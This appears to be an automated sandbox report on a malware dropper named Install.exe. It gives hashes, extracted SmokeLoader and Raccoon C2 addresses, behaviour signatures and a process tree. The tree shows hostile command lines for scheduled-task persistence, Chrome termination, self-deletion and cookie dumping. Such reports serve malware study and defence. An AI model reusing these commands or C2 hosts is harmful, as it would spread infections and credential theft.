Resubmissions

12-11-2024 01:29

241112-bwgrxs1gnf 10

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

Analysis

  • max time kernel
    233s
  • max time network
    1803s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    15-05-2021 10:18

General

  • Target

    Install.exe

  • Size

    497KB

  • MD5

    41a5f4fd1ea7cac4aa94a87aebccfef0

  • SHA1

    0d0abf079413a4c773754bf4fda338dc5b9a8ddc

  • SHA256

    97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

  • SHA512

    5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Extracted

Family

raccoon

Botnet

afefd33a49c7cbd55d417545269920f24c85aa37

Attributes
  • url4cnc

    https://telete.in/jagressor_kz

rc4.plain
rc4.plain

Signatures

  • Detected facebook phishing page
  • Gozi RM3

    A heavily modified version of Gozi using RM3 loader.

  • Modifies WinLogon for persistence 2 TTPs 8 IoCs
  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 64 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 54 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 1 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 19 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Program crash 2 IoCs
  • Drops file in System32 directory 42 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 31 IoCs
  • Drops file in Windows directory 33 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 32 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 39 IoCs
  • Modifies data under HKEY_USERS 33 IoCs
  • Modifies registry class 34 IoCs
  • Modifies system certificate store 2 TTPs 22 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 11 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 32 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 9 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:468
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        PID:876
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {137C5217-A3A2-4EFF-AE02-B51B320DB963} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
          3⤵
            PID:3492
            • C:\Users\Admin\AppData\Roaming\ahfctae
              C:\Users\Admin\AppData\Roaming\ahfctae
              4⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              PID:2800
              • C:\Users\Admin\AppData\Roaming\ahfctae
                C:\Users\Admin\AppData\Roaming\ahfctae
                5⤵
                • Executes dropped EXE
                • Checks SCSI registry key(s)
                • Suspicious behavior: MapViewOfSection
                PID:7536
          • C:\Windows\system32\taskeng.exe
            taskeng.exe {E6825558-C3CB-4A45-871B-D331B5C59571} S-1-5-18:NT AUTHORITY\System:Service:
            3⤵
            • Loads dropped DLL
            PID:2796
            • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
              "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 8080
              4⤵
              • Executes dropped EXE
              PID:4072
            • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
              "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 8080
              4⤵
              • Executes dropped EXE
              PID:3508
            • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
              "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 8080
              4⤵
              • Executes dropped EXE
              PID:3792
            • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
              "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 8080
              4⤵
              • Executes dropped EXE
              PID:5000
            • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
              "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 8080
              4⤵
              • Executes dropped EXE
              PID:5624
            • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
              "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 8080
              4⤵
              • Executes dropped EXE
              PID:5892
          • C:\Windows\system32\taskeng.exe
            taskeng.exe {DBE87E68-C546-4919-80D1-965FCC15F48E} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
            3⤵
              PID:3636
              • C:\Users\Admin\AppData\Roaming\ahfctae
                C:\Users\Admin\AppData\Roaming\ahfctae
                4⤵
                  PID:3172
                  • C:\Users\Admin\AppData\Roaming\ahfctae
                    C:\Users\Admin\AppData\Roaming\ahfctae
                    5⤵
                      PID:7928
                  • C:\Users\Admin\AppData\Roaming\ahfctae
                    C:\Users\Admin\AppData\Roaming\ahfctae
                    4⤵
                      PID:2932
                      • C:\Users\Admin\AppData\Roaming\ahfctae
                        C:\Users\Admin\AppData\Roaming\ahfctae
                        5⤵
                          PID:8104
                  • C:\Windows\system32\msiexec.exe
                    C:\Windows\system32\msiexec.exe /V
                    2⤵
                    • Enumerates connected drives
                    • Drops file in Program Files directory
                    • Drops file in Windows directory
                    • Modifies data under HKEY_USERS
                    • Modifies registry class
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2904
                    • C:\Windows\syswow64\MsiExec.exe
                      C:\Windows\syswow64\MsiExec.exe -Embedding ADE4A0046ED0ADDE27B25180BB86C08C C
                      3⤵
                      • Loads dropped DLL
                      PID:2700
                    • C:\Windows\syswow64\MsiExec.exe
                      C:\Windows\syswow64\MsiExec.exe -Embedding 7DB65ECE71A34ED2E9891B0EE429B2FC
                      3⤵
                      • Blocklisted process makes network request
                      • Loads dropped DLL
                      PID:3752
                      • C:\Windows\SysWOW64\taskkill.exe
                        "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                        4⤵
                        • Kills process with taskkill
                        PID:3940
                    • C:\Windows\syswow64\MsiExec.exe
                      C:\Windows\syswow64\MsiExec.exe -Embedding DC74815E31157DAA86ED17C04D9F17B7 M Global\MSI0000
                      3⤵
                      • Loads dropped DLL
                      PID:2956
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                    2⤵
                    • Drops file in System32 directory
                    • Checks processor information in registry
                    • Modifies data under HKEY_USERS
                    • Modifies registry class
                    PID:3728
                • C:\Users\Admin\AppData\Local\Temp\Install.exe
                  "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                  1⤵
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:296
                  • C:\Users\Admin\AppData\Local\Temp\is-M3U5E.tmp\Install.tmp
                    "C:\Users\Admin\AppData\Local\Temp\is-M3U5E.tmp\Install.tmp" /SL5="$2015A,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"
                    2⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:2000
                    • C:\Users\Admin\AppData\Local\Temp\is-PEP6B.tmp\Ultra.exe
                      "C:\Users\Admin\AppData\Local\Temp\is-PEP6B.tmp\Ultra.exe" /S /UID=burnerch1
                      3⤵
                      • Drops file in Drivers directory
                      • Executes dropped EXE
                      • Adds Run key to start application
                      • Drops file in Program Files directory
                      • Suspicious use of WriteProcessMemory
                      PID:808
                      • C:\Program Files\Windows Mail\OWAPJHKKTA\ultramediaburner.exe
                        "C:\Program Files\Windows Mail\OWAPJHKKTA\ultramediaburner.exe" /VERYSILENT
                        4⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of WriteProcessMemory
                        PID:656
                        • C:\Users\Admin\AppData\Local\Temp\is-BHNCJ.tmp\ultramediaburner.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-BHNCJ.tmp\ultramediaburner.tmp" /SL5="$6012C,281924,62464,C:\Program Files\Windows Mail\OWAPJHKKTA\ultramediaburner.exe" /VERYSILENT
                          5⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Drops file in Program Files directory
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of FindShellTrayWindow
                          • Suspicious use of WriteProcessMemory
                          PID:1532
                          • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                            "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                            6⤵
                            • Executes dropped EXE
                            PID:1396
                      • C:\Users\Admin\AppData\Local\Temp\98-b8fcc-5d2-832a3-b7bd2351e3dab\Dycaejuqepu.exe
                        "C:\Users\Admin\AppData\Local\Temp\98-b8fcc-5d2-832a3-b7bd2351e3dab\Dycaejuqepu.exe"
                        4⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:1992
                        • C:\Program Files\Internet Explorer\iexplore.exe
                          "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                          5⤵
                          • Modifies Internet Explorer settings
                          • Suspicious use of FindShellTrayWindow
                          • Suspicious use of SetWindowsHookEx
                          • Suspicious use of WriteProcessMemory
                          PID:1588
                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1588 CREDAT:275457 /prefetch:2
                            6⤵
                            • Modifies Internet Explorer settings
                            • Suspicious use of SetWindowsHookEx
                            PID:1304
                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1588 CREDAT:340994 /prefetch:2
                            6⤵
                            • Modifies Internet Explorer settings
                            • Suspicious use of SetWindowsHookEx
                            PID:2388
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1404
                              7⤵
                              • Program crash
                              • Suspicious behavior: GetForegroundWindowSpam
                              PID:2432
                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1588 CREDAT:1389578 /prefetch:2
                            6⤵
                              PID:7860
                          • C:\Program Files\Internet Explorer\iexplore.exe
                            "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                            5⤵
                              PID:7556
                          • C:\Users\Admin\AppData\Local\Temp\31-01985-823-ba399-72568b1d9a55c\Xazhuraesigi.exe
                            "C:\Users\Admin\AppData\Local\Temp\31-01985-823-ba399-72568b1d9a55c\Xazhuraesigi.exe"
                            4⤵
                            • Executes dropped EXE
                            • Modifies system certificate store
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:756
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xyjjruu0.uw3\001.exe & exit
                              5⤵
                              • Suspicious use of WriteProcessMemory
                              PID:2684
                              • C:\Users\Admin\AppData\Local\Temp\xyjjruu0.uw3\001.exe
                                C:\Users\Admin\AppData\Local\Temp\xyjjruu0.uw3\001.exe
                                6⤵
                                • Executes dropped EXE
                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                PID:2816
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2asrlsfn.k1k\installer.exe /qn CAMPAIGN="654" & exit
                              5⤵
                              • Suspicious use of WriteProcessMemory
                              PID:2268
                              • C:\Users\Admin\AppData\Local\Temp\2asrlsfn.k1k\installer.exe
                                C:\Users\Admin\AppData\Local\Temp\2asrlsfn.k1k\installer.exe /qn CAMPAIGN="654"
                                6⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Enumerates connected drives
                                • Modifies system certificate store
                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of FindShellTrayWindow
                                PID:2344
                                • C:\Windows\SysWOW64\msiexec.exe
                                  "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\2asrlsfn.k1k\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\2asrlsfn.k1k\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1620814534 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                  7⤵
                                    PID:3412
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g2susxoj.hvc\hbggg.exe & exit
                                5⤵
                                • Suspicious use of WriteProcessMemory
                                PID:2660
                                • C:\Users\Admin\AppData\Local\Temp\g2susxoj.hvc\hbggg.exe
                                  C:\Users\Admin\AppData\Local\Temp\g2susxoj.hvc\hbggg.exe
                                  6⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Adds Run key to start application
                                  • Modifies system certificate store
                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                  PID:2732
                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    7⤵
                                    • Executes dropped EXE
                                    PID:2812
                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    7⤵
                                    • Executes dropped EXE
                                    PID:3840
                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    7⤵
                                      PID:7960
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      7⤵
                                        PID:1240
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uujlhgc4.ism\google-game.exe & exit
                                    5⤵
                                      PID:3468
                                      • C:\Users\Admin\AppData\Local\Temp\uujlhgc4.ism\google-game.exe
                                        C:\Users\Admin\AppData\Local\Temp\uujlhgc4.ism\google-game.exe
                                        6⤵
                                        • Executes dropped EXE
                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                        PID:3496
                                        • C:\Windows\SysWOW64\rUNdlL32.eXe
                                          "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                          7⤵
                                          • Loads dropped DLL
                                          • Modifies registry class
                                          PID:3640
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iq1f33zd.4pn\huesaa.exe & exit
                                      5⤵
                                        PID:3876
                                        • C:\Users\Admin\AppData\Local\Temp\iq1f33zd.4pn\huesaa.exe
                                          C:\Users\Admin\AppData\Local\Temp\iq1f33zd.4pn\huesaa.exe
                                          6⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Modifies system certificate store
                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                          PID:3920
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            7⤵
                                            • Executes dropped EXE
                                            PID:4016
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            7⤵
                                            • Executes dropped EXE
                                            PID:3280
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            7⤵
                                              PID:8092
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              7⤵
                                                PID:324
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zibyva1k.apu\setup.exe & exit
                                            5⤵
                                              PID:2256
                                              • C:\Users\Admin\AppData\Local\Temp\zibyva1k.apu\setup.exe
                                                C:\Users\Admin\AppData\Local\Temp\zibyva1k.apu\setup.exe
                                                6⤵
                                                • Executes dropped EXE
                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                PID:2452
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\zibyva1k.apu\setup.exe"
                                                  7⤵
                                                    PID:2560
                                                    • C:\Windows\SysWOW64\PING.EXE
                                                      ping 1.1.1.1 -n 1 -w 3000
                                                      8⤵
                                                      • Runs ping.exe
                                                      PID:2656
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jqn5xk2r.s25\askinstall39.exe & exit
                                                5⤵
                                                  PID:2600
                                                  • C:\Users\Admin\AppData\Local\Temp\jqn5xk2r.s25\askinstall39.exe
                                                    C:\Users\Admin\AppData\Local\Temp\jqn5xk2r.s25\askinstall39.exe
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • Modifies system certificate store
                                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                    PID:2696
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /c taskkill /f /im chrome.exe
                                                      7⤵
                                                        PID:2836
                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                          taskkill /f /im chrome.exe
                                                          8⤵
                                                          • Kills process with taskkill
                                                          PID:3076
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bydirfzc.20m\customer1.exe & exit
                                                    5⤵
                                                      PID:3156
                                                      • C:\Users\Admin\AppData\Local\Temp\bydirfzc.20m\customer1.exe
                                                        C:\Users\Admin\AppData\Local\Temp\bydirfzc.20m\customer1.exe
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Modifies system certificate store
                                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                        PID:3228
                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                          7⤵
                                                          • Executes dropped EXE
                                                          PID:3248
                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                          7⤵
                                                          • Executes dropped EXE
                                                          PID:3792
                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                          7⤵
                                                            PID:2380
                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            7⤵
                                                              PID:672
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rzofkqzq.kve\toolspab1.exe & exit
                                                          5⤵
                                                            PID:3388
                                                            • C:\Users\Admin\AppData\Local\Temp\rzofkqzq.kve\toolspab1.exe
                                                              C:\Users\Admin\AppData\Local\Temp\rzofkqzq.kve\toolspab1.exe
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • Suspicious use of SetThreadContext
                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                              PID:3460
                                                              • C:\Users\Admin\AppData\Local\Temp\rzofkqzq.kve\toolspab1.exe
                                                                C:\Users\Admin\AppData\Local\Temp\rzofkqzq.kve\toolspab1.exe
                                                                7⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                • Checks SCSI registry key(s)
                                                                • Suspicious behavior: MapViewOfSection
                                                                PID:3788
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\obnzhqab.v50\GcleanerWW.exe /mixone & exit
                                                            5⤵
                                                              PID:2848
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dxo1pktq.ivw\005.exe & exit
                                                              5⤵
                                                                PID:3700
                                                                • C:\Users\Admin\AppData\Local\Temp\dxo1pktq.ivw\005.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\dxo1pktq.ivw\005.exe
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                  PID:3660
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rbws0lly.urp\installer.exe /qn CAMPAIGN="654" & exit
                                                                5⤵
                                                                  PID:3404
                                                                  • C:\Users\Admin\AppData\Local\Temp\rbws0lly.urp\installer.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\rbws0lly.urp\installer.exe /qn CAMPAIGN="654"
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                    PID:3884
                                                        • C:\Users\Admin\AppData\Local\Temp\CA41.exe
                                                          C:\Users\Admin\AppData\Local\Temp\CA41.exe
                                                          1⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:3420
                                                        • C:\Users\Admin\AppData\Local\Temp\D22E.exe
                                                          C:\Users\Admin\AppData\Local\Temp\D22E.exe
                                                          1⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:3668
                                                        • C:\Users\Admin\AppData\Local\Temp\DEDC.exe
                                                          C:\Users\Admin\AppData\Local\Temp\DEDC.exe
                                                          1⤵
                                                          • Executes dropped EXE
                                                          PID:1156
                                                        • C:\Users\Admin\AppData\Local\Temp\E469.exe
                                                          C:\Users\Admin\AppData\Local\Temp\E469.exe
                                                          1⤵
                                                          • Executes dropped EXE
                                                          PID:3852
                                                        • C:\Users\Admin\AppData\Local\Temp\F886.exe
                                                          C:\Users\Admin\AppData\Local\Temp\F886.exe
                                                          1⤵
                                                          • Executes dropped EXE
                                                          PID:2500
                                                        • C:\Users\Admin\AppData\Local\Temp\1B33.exe
                                                          C:\Users\Admin\AppData\Local\Temp\1B33.exe
                                                          1⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • Drops file in Program Files directory
                                                          PID:2816
                                                          • C:\Program Files\dcrat.exe
                                                            "C:\Program Files\dcrat.exe"
                                                            2⤵
                                                            • Modifies WinLogon for persistence
                                                            • Executes dropped EXE
                                                            • Adds Run key to start application
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • Drops file in Program Files directory
                                                            • Drops file in Windows directory
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:3304
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              "schtasks" /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Public\Pictures\Sample Pictures\conhost.exe'" /rl HIGHEST /f
                                                              3⤵
                                                              • Creates scheduled task(s)
                                                              PID:7604
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              "schtasks" /create /tn "DEDC" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\images\DEDC.exe'" /rl HIGHEST /f
                                                              3⤵
                                                              • Creates scheduled task(s)
                                                              PID:3380
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              "schtasks" /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\L2Schemas\conhost.exe'" /rl HIGHEST /f
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                              • Creates scheduled task(s)
                                                              PID:7704
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              "schtasks" /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Media Player\Network Sharing\conhost.exe'" /rl HIGHEST /f
                                                              3⤵
                                                              • Creates scheduled task(s)
                                                              PID:7636
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /C "C:\Program Files\ujPhFmtArJ.bat"
                                                              3⤵
                                                                PID:3652
                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                  ping -n 5 localhost
                                                                  4⤵
                                                                  • Runs ping.exe
                                                                  PID:8180
